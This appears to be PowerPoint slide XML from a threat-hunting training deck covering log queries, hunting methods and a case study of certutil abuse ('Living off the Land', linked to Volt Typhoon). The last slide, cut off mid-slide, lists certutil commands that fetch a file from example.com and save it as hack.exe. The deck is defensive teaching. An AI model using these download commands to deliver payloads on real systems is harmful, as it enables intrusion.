                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF693843-C3EB-6095-3175-A72EBF1FE098}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1583009" y="2180917"/>
            <a:ext cx="1412003" cy="451069"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1412003"/>
              <a:gd name="connsiteY0" fmla="*/ 225535 h 451069"/>
              <a:gd name="connsiteX1" fmla="*/ 706002 w 1412003"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 451069"/>
              <a:gd name="connsiteX2" fmla="*/ 1412004 w 1412003"/>
              <a:gd name="connsiteY2" fmla="*/ 225535 h 451069"/>
              <a:gd name="connsiteX3" fmla="*/ 706002 w 1412003"/>
              <a:gd name="connsiteY3" fmla="*/ 451070 h 451069"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 1412003"/>
              <a:gd name="connsiteY4" fmla="*/ 225535 h 45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003" h="451069" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="225535"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="-42737" y="74614"/>
                  <a:pt x="308810" y="2732"/>
                  <a:pt x="706002" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1110234" y="3014"/>
                  <a:pt x="1386124" y="101798"/>
                  <a:pt x="1412004" y="225535"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1395344" y="366365"/>
                  <a:pt x="1084933" y="511776"/>
                  <a:pt x="706002" y="451070"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="307015" y="446106"/>
                  <a:pt x="12325" y="355984"/>
                  <a:pt x="0" y="225535"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{694B001C-CA34-E458-3914-7B6271DBEA48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3614365" y="2172880"/>
            <a:ext cx="1687100" cy="451069"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1687100"/>
              <a:gd name="connsiteY0" fmla="*/ 225535 h 451069"/>
              <a:gd name="connsiteX1" fmla="*/ 843550 w 1687100"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 451069"/>
              <a:gd name="connsiteX2" fmla="*/ 1687100 w 1687100"/>
              <a:gd name="connsiteY2" fmla="*/ 225535 h 451069"/>
              <a:gd name="connsiteX3" fmla="*/ 843550 w 1687100"/>
              <a:gd name="connsiteY3" fmla="*/ 451070 h 451069"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 1687100"/>
              <a:gd name="connsiteY4" fmla="*/ 225535 h 45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100" h="451069" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="225535"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="-43367" y="74225"/>
                  <a:pt x="290089" y="32870"/>
                  <a:pt x="843550" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1323748" y="3014"/>
                  <a:pt x="1661220" y="101798"/>
                  <a:pt x="1687100" y="225535"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1631724" y="404172"/>
                  <a:pt x="1293664" y="538212"/>
                  <a:pt x="843550" y="451070"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="368597" y="446106"/>
                  <a:pt x="12325" y="355984"/>
                  <a:pt x="0" y="225535"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>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20866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36C49-E898-76B7-A195-20D5959EC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1D23E-0A14-9604-777A-48D8E7EB9FCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>A solution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CCBDDEB-15DA-CF9C-DB8D-019244799443}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="792656" y="2798987"/>
            <a:ext cx="10606687" cy="2500280"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>It is totally fine to also require “security”; if you do you shouldn’t need “-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>instanceid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Using a single </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0" err="1"/>
              <a:t>has_all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> operator is optimal, for performance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{329B7C3E-A9DA-E4E4-3D27-D090A0B56195}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect t="7483"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="746966" y="1651686"/>
            <a:ext cx="10698068" cy="678640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102309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ABDD2D-BD86-0BE8-9A87-13856E6AA23E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371599" y="294538"/>
            <a:ext cx="9895951" cy="1033669"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Threat hunting may be done by:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FCDF6DD-39A4-AB09-F278-C265B2265A3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371599" y="2203894"/>
            <a:ext cx="9985830" cy="3683358"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" b="1" dirty="0"/>
              <a:t>Collecting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0"/>
              <a:t> forensic artefacts from one or multiple devices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>An “at the time” capture of the state of the device’s memory or disk – usually only limited areas of interest are captured if there’s many devices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>E.g. On-device logs, Windows registry, running processes and network connections; or entire disk and memory if possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" b="1" dirty="0"/>
              <a:t>Examining</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0"/>
              <a:t> centralised log data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Logs forwarded from devices to a central storage system (usually cloud storage), where they are kept for 30 days – 2+ years</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>E.g. Microsoft Sentinel, CrowdStrike NG-SIEM, Splunk, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>Wazuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>, Elastic</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1302678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AD6B0A-6E1C-3AFA-D237-27F5E741EC7D}"/>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6F3E3C6-950A-FFFE-F249-7775B7A19CBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371597" y="348865"/>
            <a:ext cx="10044023" cy="877729"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Review</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BBB0F5B-E46C-6A5F-22ED-75B58615C1C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="115834517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4501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A0B487-F9F3-5D14-99B9-1B8A3FF3B95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9670E0-9D0D-4219-1C92-A5F51868C037}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1386865" y="818984"/>
            <a:ext cx="6596245" cy="3268520"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-AU" sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Time for a harder case study</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17">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6E5F46DD-D594-3B9B-5969-4009F80B3521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1931874" y="4797188"/>
            <a:ext cx="6051236" cy="1241828"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-AU">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Abuse of certutil: “Living off the Land” activity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19">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3553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C364D-0AB5-E6CD-2185-D208F1188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29FCC-1247-9843-04F3-8B10A8FC1028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Volt Typhoon uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>certutil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>… somehow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10160399-4B79-849B-AA48-1927A59303F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4388332"/>
            <a:ext cx="10515600" cy="2429263"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Volt Typhoon uses built-in Windows commands to attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>This is known as “Living off the Land”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>There’s a lot here, potentially a detection goldmine – but no info?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Hunting requires research</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Let’s focus on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>certutil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> as an example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BD421B4-E212-5F52-BB9F-CF323AB02B9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393798" y="1590631"/>
            <a:ext cx="9404404" cy="2790708"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1918011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C4EFE-8F5C-B9EF-D739-C502FF4661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4C3186-640C-427E-727D-17CA6ECAEF98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>Reseraching</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>certutil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> abuse possibilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA1436BF-1419-094B-8C8E-FC1DE6F68638}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4063612"/>
            <a:ext cx="10515600" cy="2794388"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>Certutil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> is supposed to be a certificate services management tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>However, it has functions that allow it to be used for downloading files, saving files with alternate data streams, and encoding or decoding data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Research reveals that the main concern in the security community is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>certutil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> being used to download files. This is most likely for VT.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{358306E0-01F1-F51C-44BD-95FD28F3A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906" y="1957954"/>
            <a:ext cx="1326079" cy="13282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ECAD67B-3479-B15B-DAD4-BF6F36659266}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1930810" y="1690688"/>
            <a:ext cx="9061920" cy="2320174"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB4302D1-FA16-1138-F210-7E467DB121FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="331746" y="3286185"/>
            <a:ext cx="1658678" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>lolbas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>-project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>.github.io</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35609036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96CDAD-FB21-4543-9E79-B516C24FB09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2AAA5E-B461-829E-7397-2C793A1363F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371599" y="294538"/>
            <a:ext cx="9895951" cy="1033669"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Certutil download possibilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1F342AA-9099-284D-94DB-F931BEA8FE69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371599" y="2318197"/>
            <a:ext cx="9724031" cy="3683358"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>certutil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>urlcache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –f https://example.com/file.123 hack.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t>Downloads and saves the file in the current folder as hack.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>certutil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>verifyctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –f https://example.com/file.123 hack.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t>Downloads and saves the file to the current folder as hack.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>certutil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –URL https://example.com/file.123 hack.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t>Downloads and saves the file to %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" err="1"/>
              <a:t>LOCALAPPDATA%low</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t>\Microsoft\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" err="1"/>
              <a:t>CryptnetUrlCache</a:t>
            </a:r>
            <a:r>
